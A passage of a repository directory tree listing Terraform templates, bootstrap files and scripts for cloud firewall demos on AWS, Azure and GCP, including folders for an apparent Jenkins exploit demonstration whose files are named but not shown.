├── .gitignore
├── README.md
├── aws
    ├── GWLB-Demo
    │   ├── README.md
    │   ├── app_stack
    │   │   ├── alb.tf
    │   │   ├── gwlbe.tf
    │   │   ├── gwlbeapp1.py
    │   │   ├── gwlbeapp2.py
    │   │   ├── instance.tf
    │   │   ├── main.tf
    │   │   ├── network.tf
    │   │   ├── output.tf
    │   │   ├── securitygroup.tf
    │   │   ├── variables.tf
    │   │   └── web_server.sh
    │   ├── appstack.tf
    │   ├── bootstrap.xml
    │   ├── gwlb.py
    │   ├── gwlb.tf
    │   ├── init-cfg.txt
    │   ├── instance.tf
    │   ├── main.tf
    │   ├── network.tf
    │   ├── output.tf
    │   ├── requirements.txt
    │   ├── securitygroup.tf
    │   ├── terraform.tfvars
    │   ├── topology.png
    │   ├── transitgw.tf
    │   └── variables.tf
    ├── Jenkins-sans-Panhandler
    │   ├── README.md
    │   ├── aws_vars.tf
    │   ├── blue-team-bootstrap.tf
    │   ├── blue-team-firewalls.tf
    │   ├── blue-team-igw-ngw.tf
    │   ├── blue-team-loadbalancers.tf
    │   ├── blue-team-public-ips.tf
    │   ├── blue-team-route-tables.tf
    │   ├── blue-team-server.tf
    │   ├── blue-team-sg.tf
    │   ├── blue-team-vpc-subnets-rt.tf
    │   ├── bootstrap
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── red-team-igw.tf
    │   ├── red-team-public-ips.tf
    │   ├── red-team-route-tables.tf
    │   ├── red-team-server.tf
    │   ├── red-team-sg.tf
    │   ├── red-team-vpc-subnets.tf
    │   ├── scripts
    │   │   ├── initialize_attacker.sh
    │   │   ├── initialize_jenkins.sh
    │   │   ├── initialize_kali.sh
    │   │   └── initialize_struts.sh
    │   ├── terraform.tfvars
    │   ├── waf_acl_association.tf
    │   ├── waf_ip_objects.tf
    │   └── waf_web_acl.tf
    ├── Jenkins_proj-master
    │   ├── .gitignore
    │   ├── .pan-cnc
    │   │   ├── deploy
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── destroy
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── launch
    │   │   │   └── .meta-cnc.yaml
    │   │   └── send
    │   │   │   └── .meta-cnc.yaml
    │   ├── .temp
    │   │   ├── Dockerfile
    │   │   └── docker-compose.yml
    │   ├── README.md
    │   ├── WebInDeploy
    │   │   ├── ACL-SG.tf
    │   │   ├── NAT_GW_Trust.tf
    │   │   ├── aws_vars.tf
    │   │   ├── bootstrap.tf
    │   │   ├── bootstrap
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   │   ├── firewalls.tf
    │   │   ├── kali vpc-subnets.tf
    │   │   ├── kali-ACL-SG.tf
    │   │   ├── kali-instance.tf
    │   │   ├── kali-public-ips.tf
    │   │   ├── kali-route-tables.tf
    │   │   ├── loadbalancers.tf
    │   │   ├── outputs.tf
    │   │   ├── public_ips.tf
    │   │   ├── route-tables.tf
    │   │   ├── scripts
    │   │   │   ├── initialize_attacker.sh
    │   │   │   └── initialize_webserver.sh
    │   │   ├── template.txt
    │   │   ├── terraform.tfvars
    │   │   ├── vpc-subnets-RT.tf
    │   │   └── webservers.tf
    │   ├── WebInFWConf
    │   │   ├── README.md
    │   │   ├── firewallconfig1.tf
    │   │   ├── terraform.tfvars
    │   │   └── vars.tf
    │   ├── attacker
    │   │   ├── Dockerfile
    │   │   ├── auto-sploit.sh
    │   │   ├── docker-compose.yml
    │   │   ├── exp-server.py
    │   │   └── run.sh
    │   ├── capture_outputs.py
    │   ├── deploy-v2.py
    │   ├── deploy.py
    │   ├── deployold.py
    │   ├── destroy.py
    │   ├── exp-server.py
    │   ├── jenkins
    │   │   ├── Dockerfile
    │   │   ├── config.xml
    │   │   ├── docker-compose.yml
    │   │   ├── jenkins.sh
    │   │   └── tini
    │   ├── launch_attack_vector.py
    │   ├── payload
    │   │   ├── Payload.java
    │   │   ├── commons-beanutils-1.8.3.jar
    │   │   ├── commons-collections-3.2.1.jar
    │   │   ├── commons-lang-2.6.jar
    │   │   ├── commons-logging-1.2.jar
    │   │   ├── exploit.py
    │   │   ├── ezmorph-1.0.6.jar
    │   │   ├── json-lib-2.4-jenkins-2.jar
    │   │   └── payload.jar
    │   ├── requirements.txt
    │   ├── send_command.py
    │   └── waf_conf
    │   │   ├── outputs_waf.tf
    │   │   ├── terraform.tfvars
    │   │   ├── vars_waf.tf
    │   │   ├── waf_acl_associate.tf
    │   │   ├── waf_condition_ip.tf
    │   │   ├── waf_condition_size.tf
    │   │   ├── waf_condition_sql.tf
    │   │   ├── waf_condition_string_match.tf
    │   │   ├── waf_condition_xss.tf
    │   │   ├── waf_rule.tf
    │   │   └── waf_web_acl.tf
    ├── PANW-Honeypot-Demo
    │   ├── README.md
    │   ├── aws_vars.tf
    │   ├── blue-team-bootstrap.tf
    │   ├── blue-team-firewalls.tf
    │   ├── blue-team-igw-ngw.tf
    │   ├── blue-team-public-ips.tf
    │   ├── blue-team-route-tables.tf
    │   ├── blue-team-server.tf
    │   ├── blue-team-sg.tf
    │   ├── blue-team-vpc-subnets-rt.tf
    │   ├── bootstrap
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── scripts
    │   │   ├── initialize_cowrie.sh
    │   │   └── initialize_mysql.sh
    │   ├── terraform.tfvars
    │   └── versions.tf
    ├── README.md
    ├── RedLock-IAMroles-tf
    │   ├── readme.MD
    │   ├── readonly
    │   │   ├── aws_iam_policy_document_rl_ro.json
    │   │   ├── rl-ro-role.tf
    │   │   └── variables.tf
    │   └── readwrite
    │   │   ├── aws_iam_policy_document_rl_ro.json
    │   │   ├── aws_iam_policy_remediation.json
    │   │   ├── rl-rw-role.tf
    │   │   └── variables.tf
    ├── TGW-RT-Build-Skeleton
    │   ├── README.md
    │   ├── aws_creds.tf
    │   ├── outputs.tf
    │   ├── tgw.tf
    │   └── variables.tf
    ├── TGW-VPC-Mirroring
    │   ├── README.md
    │   ├── bootstrap.tf
    │   ├── bootstrap2.tf
    │   ├── bootstrap3.tf
    │   ├── bootstrap4.tf
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── bootstrap_files2
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── bootstrap_files3
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── bootstrap_files4
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── nlb.tf
    │   ├── providers.tf
    │   ├── tgw.tf
    │   ├── variables.tf
    │   ├── vm-series
    │   │   └── main.tf
    │   ├── vpc_security.tf
    │   ├── vpc_spoke
    │   │   └── main.tf
    │   └── vpc_spokes.tf
    ├── TGW-VPC
    │   ├── README.md
    │   ├── bootstrap.tf
    │   ├── bootstrap2.tf
    │   ├── bootstrap_files
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── bootstrap_files2
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── providers.tf
    │   ├── tgw.tf
    │   ├── variables.tf
    │   ├── vm-series
    │   │   └── main.tf
    │   ├── vpc_security.tf
    │   ├── vpc_spoke
    │   │   └── main.tf
    │   └── vpc_spokes.tf
    ├── VPC_Mirror_Target
    │   ├── README.md
    │   ├── bootstrap3.tf
    │   ├── bootstrap4.tf
    │   ├── bootstrap_files3
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── bootstrap_files4
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── nlb.tf
    │   ├── providers.tf
    │   ├── variables.tf
    │   ├── vm-series
    │   │   └── main.tf
    │   └── vpc_security.tf
    ├── sdwan-lab
    │   ├── access-control-lists.tf
    │   ├── aws_vars.tf
    │   ├── branch25-fw-bootstrap.tf
    │   ├── branch25-fw-bootstrap
    │   │   └── init-cfg.txt
    │   ├── branch25-fw.tf
    │   ├── branch50-fw-bootstrap.tf
    │   ├── branch50-fw-bootstrap
    │   │   └── init-cfg.txt
    │   ├── branch50-fw.tf
    │   ├── hub-fw-bootstrap.tf
    │   ├── hub-fw-bootstrap
    │   │   └── init-cfg.txt
    │   ├── hub-fw.tf
    │   ├── internet-gateway.tf
    │   ├── public-ips.tf
    │   ├── route-tables.tf
    │   ├── security-groups.tf
    │   ├── servers.tf
    │   ├── terraform.tfvars
    │   └── vpc-subnets.tf
    ├── tgw_2fw_vpc_insertion
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── fw1
    │   │   │   ├── authcodes
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   │   └── fw2
    │   │   │   ├── authcodes
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   ├── create_s3_bootstrap.tf
    │   ├── create_tgw.tf
    │   ├── create_vpc_security.tf
    │   ├── create_vpc_spokes.tf
    │   ├── images
    │   │   ├── diagram.png
    │   │   └── readme.md
    │   ├── modules
    │   │   ├── vm-series
    │   │   │   └── main.tf
    │   │   └── vm-spoke
    │   │   │   └── main.tf
    │   ├── providers.tf
    │   └── variables.tf
    ├── tgw_2fw_vpc_insertion_v12
    │   └── README.md
    ├── tgw_inbound_asg-GovCloud
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   ├── init-cfg.txt
    │   │   ├── nlb.zip
    │   │   ├── pan_nlb_lambda.template
    │   │   └── panw-aws.zip
    │   ├── diagram.png
    │   ├── main.tf
    │   ├── modules
    │   │   ├── fw_in_asg
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── s3_bootstrap
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   └── vpc_in
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   ├── outputs.tf
    │   └── variables.tf
    ├── tgw_inbound_asg
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   ├── init-cfg.txt
    │   │   ├── nlb.zip
    │   │   ├── pan_nlb_lambda.template
    │   │   └── panw-aws.zip
    │   ├── diagram.png
    │   ├── main.tf
    │   ├── modules
    │   │   ├── fw_in_asg
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── s3_bootstrap
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   └── vpc_in
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   ├── outputs.tf
    │   └── variables.tf
    └── transitgateway-demo-v2
    │   ├── README.md
    │   ├── bootstrap_files
    │       ├── fw1
    │       │   ├── authcodes
    │       │   ├── bootstrap.xml
    │       │   └── init-cfg.txt
    │       └── fw2
    │       │   ├── authcodes
    │       │   ├── bootstrap.xml
    │       │   └── init-cfg.txt
    │   ├── create_s3_bootstrap.tf
    │   ├── create_tgw.tf
    │   ├── create_vpc_security.tf
    │   ├── create_vpc_spokes.tf
    │   ├── iam
    │       ├── lambda-assume-policy.json
    │       ├── lambda-policy.json
    │       └── variables.tf
    │   ├── lambda.tf
    │   ├── lambda
    │       ├── lambda-combined.zip
    │       └── layer.zip
    │   ├── modules
    │       ├── vm-series
    │       │   └── main.tf
    │       └── vm-spoke
    │       │   └── main.tf
    │   ├── providers.tf
    │   └── variables.tf
├── azure
    ├── Jenkins-sans-Panhandler
    │   ├── README.md
    │   ├── azure_firewall.tf
    │   ├── azure_vars.tf
    │   ├── bootstrap
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── firewall.tf
    │   ├── interfaces.tf
    │   ├── kali-interfaces.tf
    │   ├── kali-nsg.tf
    │   ├── kali-public-ips.tf
    │   ├── kali-rg-subnets.tf
    │   ├── kali-route-tables.tf
    │   ├── kali-server.tf
    │   ├── loadbalancers.tf
    │   ├── nsg.tf
    │   ├── outputs.tf
    │   ├── provider.tf
    │   ├── public-ips.tf
    │   ├── rg-subnets.tf
    │   ├── route-tables.tf
    │   ├── scripts
    │   │   ├── initialize_attacker.sh
    │   │   ├── initialize_jenkins.sh
    │   │   ├── initialize_kali.sh
    │   │   ├── initialize_struts.sh
    │   │   └── initialize_webserver.sh
    │   ├── terraform.tfvars
    │   └── webservers.tf
    ├── Jenkins_proj-master
    │   ├── .gitignore
    │   ├── .pan-cnc
    │   │   ├── deploy
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── destroy
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── launch
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── login
    │   │   │   └── .meta-cnc.yaml
    │   │   └── send
    │   │   │   └── .meta-cnc.yaml
    │   ├── WebInBootstrap
    │   │   ├── azure_vars.tf
    │   │   ├── bootstrap.tf
    │   │   ├── outputs.tf
    │   │   ├── resourcegroup.tf
    │   │   └── terraform.tfvars
    │   ├── WebInDeploy
    │   │   ├── azure_vars.tf
    │   │   ├── bootstrap.tf
    │   │   ├── bootstrap
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   │   ├── firewall.tf
    │   │   ├── interfaces.tf
    │   │   ├── kali-interfaces.tf
    │   │   ├── kali-nsg.tf
    │   │   ├── kali-public-ips.tf
    │   │   ├── kali-rg-subnets.tf
    │   │   ├── kali-route-tables.tf
    │   │   ├── kali-server.tf
    │   │   ├── loadbalancers.tf
    │   │   ├── nsg.tf
    │   │   ├── outputs.bak
    │   │   ├── outputs.tf
    │   │   ├── public-ips.tf
    │   │   ├── rg-subnets.tf
    │   │   ├── route-tables.tf
    │   │   ├── scripts
    │   │   │   ├── initialize_attacker.sh
    │   │   │   ├── initialize_attacker1.sh
    │   │   │   ├── initialize_webserver.sh
    │   │   │   └── initialize_webserver1.sh
    │   │   ├── terraform.tfvars
    │   │   ├── vnet-subnets.tf
    │   │   └── webservers.tf
    │   ├── WebInFWConf
    │   │   ├── azure_vars.tf
    │   │   ├── firewallconfig.tf
    │   │   └── terraform.tfvars
    │   ├── attacker
    │   │   ├── Dockerfile
    │   │   ├── auto-sploit.sh
    │   │   ├── docker-compose.yml
    │   │   ├── exp-server.py
    │   │   └── run.sh
    │   ├── azure_login.py
    │   ├── deploy-v2.html
    │   ├── deploy.py
    │   ├── deployold.py
    │   ├── destroy-old.py
    │   ├── destroy.py
    │   ├── jenkins
    │   │   ├── Dockerfile
    │   │   ├── config.xml
    │   │   ├── docker-compose.yml
    │   │   ├── jenkins.sh
    │   │   └── tini
    │   ├── launch_attack_vector.py
    │   ├── payload
    │   │   ├── Payload.java
    │   │   ├── commons-beanutils-1.8.3.jar
    │   │   ├── commons-collections-3.2.1.jar
    │   │   ├── commons-lang-2.6.jar
    │   │   ├── commons-logging-1.2.jar
    │   │   ├── exploit.py
    │   │   ├── ezmorph-1.0.6.jar
    │   │   ├── json-lib-2.4-jenkins-2.jar
    │   │   └── payload.jar
    │   ├── requirements.txt
    │   └── send_command.py
    ├── Jenkins_proj-working
    │   ├── WebInBootstrap
    │   │   ├── azure_vars.tf
    │   │   ├── bootstrap.tf
    │   │   ├── outputs.tf
    │   │   ├── resourcegroup.tf
    │   │   └── terraform.tfvars
    │   ├── WebInDeploy
    │   │   ├── azure_vars.tf
    │   │   ├── bootstrap.tf
    │   │   ├── bootstrap
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   │   ├── firewall.tf
    │   │   ├── interfaces.tf
    │   │   ├── kali-interfaces.tf
    │   │   ├── kali-nsg.tf
    │   │   ├── kali-public-ips.tf
    │   │   ├── kali-rg-subnets.tf
    │   │   ├── kali-route-tables.tf
    │   │   ├── kali-server.tf
    │   │   ├── loadbalancers.tf
    │   │   ├── nsg.tf
    │   │   ├── outputs.bak
    │   │   ├── outputs.tf
    │   │   ├── public-ips.tf
    │   │   ├── rg-subnets.tf
    │   │   ├── route-tables.tf
    │   │   ├── scripts
    │   │   │   ├── initialize_attacker.sh
    │   │   │   ├── initialize_attacker1.sh
    │   │   │   ├── initialize_webserver.sh
    │   │   │   └── initialize_webserver1.sh
    │   │   ├── terraform.tfvars
    │   │   ├── vnet-subnets.tf
    │   │   └── webservers.tf
    │   ├── WebInFWConf
    │   │   ├── azure_vars.tf
    │   │   ├── firewallconfig.tf
    │   │   └── terraform.tfvars
    │   ├── attacker
    │   │   ├── Dockerfile
    │   │   ├── auto-sploit.sh
    │   │   ├── docker-compose.yml
    │   │   ├── exp-server.py
    │   │   └── run.sh
    │   ├── azure_login.py
    │   ├── deploy-v2.html
    │   ├── deploy.py
    │   ├── deployment_status.json
    │   ├── deployold.py
    │   ├── destroy-old.py
    │   ├── destroy.py
    │   ├── jenkins
    │   │   ├── Dockerfile
    │   │   ├── config.xml
    │   │   ├── docker-compose.yml
    │   │   ├── jenkins.sh
    │   │   └── tini
    │   ├── launch_attack_vector.py
    │   ├── payload
    │   │   ├── Payload.java
    │   │   ├── commons-beanutils-1.8.3.jar
    │   │   ├── commons-collections-3.2.1.jar
    │   │   ├── commons-lang-2.6.jar
    │   │   ├── commons-logging-1.2.jar
    │   │   ├── exploit.py
    │   │   ├── ezmorph-1.0.6.jar
    │   │   ├── json-lib-2.4-jenkins-2.jar
    │   │   └── payload.jar
    │   ├── requirements.txt
    │   ├── requirementsold2.txt
    │   └── send_command.py
    ├── README.md
    ├── panorama_new_rg
    │   ├── README.md
    │   ├── interfaces.tf
    │   ├── nsg.tf
    │   ├── outputs.tf
    │   ├── panorama.tf
    │   ├── public-ips.tf
    │   ├── resource-group.tf
    │   ├── route-tables.tf
    │   ├── storage-account.tf
    │   ├── terraform.tfvars.sample
    │   ├── variables.tf
    │   └── vnet-subnets.tf
    ├── transit_2fw_2spoke_common
    │   ├── GUIDE.pdf
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   └── common_fw
    │   │   │   ├── config
    │   │   │       ├── bootstrap.xml
    │   │   │       └── init-cfg.txt
    │   │   │   ├── content
    │   │   │       └── .gitignore
    │   │   │   ├── license
    │   │   │       └── authcodes
    │   │   │   └── software
    │   │   │       └── .gitignore
    │   ├── fw_common.tf
    │   ├── fw_vnet.tf
    │   ├── images
    │   │   ├── diagram.png
    │   │   └── tfvars.png
    │   ├── modules
    │   │   ├── azure_bootstrap
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── lb
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── peering
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── spoke_vm
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vmseries
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   └── vnet
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   ├── providers.tf
    │   ├── scripts
    │   │   ├── showheaders.php
    │   │   └── web_startup.yml.tpl
    │   ├── spokes.tf
    │   ├── terraform.tfvars
    │   └── variables.tf
    └── transit_2fw_2spoke_common_appgw
    │   ├── GUIDE.pdf
    │   ├── README.md
    │   ├── bootstrap_files
    │       ├── config
    │       │   ├── bootstrap.xml
    │       │   └── init-cfg.txt
    │       ├── content
    │       │   └── .gitignore
    │       ├── license
    │       │   └── authcodes
    │       └── software
    │       │   └── .gitignore
    │   ├── fw_common.tf
    │   ├── fw_vnet.tf
    │   ├── images
    │       ├── diagram.png
    │       └── tfvars.png
    │   ├── modules
    │       ├── appgw
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │       ├── azure_bootstrap
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │       ├── lb
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │       ├── peering
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │       ├── spoke_vm
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │       ├── vmseries
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │       └── vnet
    │       │   ├── main.tf
    │       │   ├── outputs.tf
    │       │   └── variables.tf
    │   ├── providers.tf
    │   ├── scripts
    │       ├── showheaders.php
    │       └── web_startup.yml.tpl
    │   ├── spokes.tf
    │   ├── terraform.tfvars
    │   └── variables.tf
├── gcp
    ├── GP-NoAutoScaling
    │   ├── Guide.pdf
    │   ├── README.md
    │   ├── bootstrap-gateway.tf
    │   ├── bootstrap-gateway
    │   │   ├── bootstrap.xml
    │   │   ├── init-cfg.txt
    │   │   └── null.txt
    │   ├── bootstrap-portal.tf
    │   ├── bootstrap-portal
    │   │   ├── bootstrap.xml
    │   │   ├── init-cfg.txt
    │   │   └── null.txt
    │   ├── gateways.tf
    │   ├── gcp_firewall.tf
    │   ├── images
    │   │   └── GP_in_GCP.png
    │   ├── main.tf
    │   ├── output.tf
    │   ├── portal.tf
    │   ├── project.tf
    │   ├── servers.tf
    │   ├── terraform.tfvars
    │   ├── variables.tf
    │   ├── vpc-subnets.tf
    │   └── webservers.tf
    ├── Jenkins-sans-Panhandler
    │   ├── README.md
    │   ├── attacker.tf
    │   ├── bootstrap.tf
    │   ├── bootstrap
    │   │   ├── bootstrap.xml
    │   │   ├── init-cfg.txt
    │   │   └── null.txt
    │   ├── firewall.tf
    │   ├── gcp_firewall.tf
    │   ├── gcp_vars.tf
    │   ├── lb-firewall.tf
    │   ├── lb-webserver.tf
    │   ├── main.tf
    │   ├── output.tf
    │   ├── project.tf
    │   ├── scripts
    │   │   ├── initialize_attacker.sh
    │   │   ├── initialize_dvwa.sh
    │   │   ├── initialize_jenkins.sh
    │   │   ├── initialize_kali.sh
    │   │   ├── initialize_struts.sh
    │   │   └── initialize_webserver.sh
    │   ├── terraform.tfvars
    │   ├── versions.tf
    │   ├── vpc-subnets.tf
    │   └── webservers.tf
    ├── Jenkins_proj-master
    │   ├── .pan-cnc
    │   │   ├── deploy
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── destroy
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── launch
    │   │   │   └── .meta-cnc.yaml
    │   │   ├── login
    │   │   │   ├── .meta-cnc.yaml
    │   │   │   └── docker_cmd.j2
    │   │   └── send
    │   │   │   └── .meta-cnc.yaml
    │   ├── README.md
    │   ├── WebInDeploy
    │   │   ├── attackers.tf
    │   │   ├── bootstrap.tf
    │   │   ├── bootstrap
    │   │   │   ├── bootstrap.xml
    │   │   │   ├── init-cfg.txt
    │   │   │   └── null.txt
    │   │   ├── firewall.tf
    │   │   ├── gcp_firewall.tf
    │   │   ├── gcp_vars.tf
    │   │   ├── initialize_attacker.sh
    │   │   ├── initialize_webserver.sh
    │   │   ├── lb-firewall.tf
    │   │   ├── lb-webserver.tf
    │   │   ├── main.tf
    │   │   ├── output.tf
    │   │   ├── project.tf
    │   │   ├── scripts
    │   │   │   ├── initialize_attacker.sh
    │   │   │   └── initialize_webserver.sh
    │   │   ├── terraform.tfvars
    │   │   ├── vpc-subnets.tf
    │   │   └── webservers.tf
    │   ├── WebInFWConf
    │   │   ├── firewallconfig.tf
    │   │   ├── gcp_vars.tf
    │   │   └── terraform.tfvars
    │   ├── deploy.py
    │   ├── destroy.py
    │   ├── gcp_login.py
    │   ├── launch_attack_vector.py
    │   ├── requirements.txt
    │   └── send_command.py
    ├── README.md
    ├── adv-peering-with-lbnh
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── bootstrap_files_ilbnh
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── deleteme
    │   ├── guide.pdf
    │   ├── ilbnh.tf
    │   ├── ilbnh_override.tf
    │   ├── images
    │   │   ├── Overview.png
    │   │   ├── peering.png
    │   │   ├── routes.png
    │   │   └── web.jpg
    │   ├── main.tf
    │   ├── modules
    │   │   ├── create_bootstrap_bucket
    │   │   │   └── main.tf
    │   │   ├── create_bootstrap_bucket_ilbnh
    │   │   │   └── main.tf
    │   │   ├── create_ilbnh
    │   │   │   └── main.tf
    │   │   ├── create_public_lb
    │   │   │   └── main.tf
    │   │   ├── create_vm
    │   │   │   └── main.tf
    │   │   ├── create_vmseries
    │   │   │   └── main.tf
    │   │   ├── create_vmseries_ilbnh
    │   │   │   └── main.tf
    │   │   └── create_vpc
    │   │   │   └── main.tf
    │   ├── outputs.tf
    │   ├── scripts
    │   │   ├── showheaders.php
    │   │   └── webserver-startup.sh
    │   ├── spoke1.tf
    │   ├── spoke2.tf
    │   └── variables.tf
    ├── adv_peering_2fw_2spoke
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── guide.pdf
    │   ├── images
    │   │   ├── diagram.png
    │   │   ├── directory.png
    │   │   ├── peering.png
    │   │   ├── routes.png
    │   │   └── web.png
    │   ├── main.tf
    │   ├── modules
    │   │   ├── create_bootstrap_bucket
    │   │   │   └── main.tf
    │   │   ├── create_public_lb
    │   │   │   └── main.tf
    │   │   ├── create_vm
    │   │   │   └── main.tf
    │   │   ├── create_vmseries
    │   │   │   └── main.tf
    │   │   └── create_vpc
    │   │   │   └── main.tf
    │   ├── outputs.tf
    │   ├── scripts
    │   │   ├── showheaders.php
    │   │   └── webserver-startup.sh
    │   ├── spoke1.tf
    │   ├── spoke2.tf
    │   └── variables.tf
    ├── adv_peering_2fw_2spoke_common
    │   ├── GUIDE.pdf
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── fw_common.tf
    │   ├── fw_vpc.tf
    │   ├── images
    │   │   ├── diagram.png
    │   │   └── tfvars.png
    │   ├── modules
    │   │   ├── gcp_bootstrap
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── lb_tcp_external
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── lb_tcp_internal
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vm
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vmseries
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   └── vpc
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   ├── project.tf
    │   ├── scripts
    │   │   ├── showheaders.php
    │   │   └── webserver-startup.sh
    │   ├── spokes.tf
    │   ├── terraform.tfvars
    │   └── variables.tf
    ├── adv_peering_4fw_2spoke
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── fw_inbound
    │   │   │   ├── authcodes
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   │   └── fw_outbound
    │   │   │   ├── authcodes
    │   │   │   ├── bootstrap.xml
    │   │   │   └── init-cfg.txt
    │   ├── diagram.png
    │   ├── fw_inbound.tf
    │   ├── fw_outbound.tf
    │   ├── fw_vpc.tf
    │   ├── guide.pdf
    │   ├── modules
    │   │   ├── gcp_bootstrap
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── glb
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── ilb
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vm
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vmseries
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   └── vpc
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   ├── outputs.tf
    │   ├── project.tf
    │   ├── scripts
    │   │   ├── showheaders.php
    │   │   └── webserver-startup.sh
    │   ├── spokes.tf
    │   ├── terraform.tfvars
    │   └── variables.tf
    ├── gcp-ilbnh
    │   ├── README.md
    │   ├── bootstrap_files_ilbnh
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── ilbnh.tf
    │   ├── ilbnh_override.tf
    │   └── modules
    │   │   ├── create_bootstrap_bucket_ilbnh
    │   │       └── main.tf
    │   │   ├── create_ilbnh
    │   │       └── main.tf
    │   │   └── create_vmseries_ilbnh
    │   │       └── main.tf
    ├── ilbnh-mig
    │   ├── README.md
    │   ├── bootstrap_files
    │   │   ├── authcodes
    │   │   ├── bootstrap.xml
    │   │   └── init-cfg.txt
    │   ├── fw_common.tf
    │   ├── fw_vpc.tf
    │   ├── images
    │   │   ├── curl.png
    │   │   ├── deployment.png
    │   │   ├── diagram.svg
    │   │   ├── directory.png
    │   │   └── fwlogs.png
    │   ├── modules
    │   │   ├── gcp_bootstrap
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── ilbnh
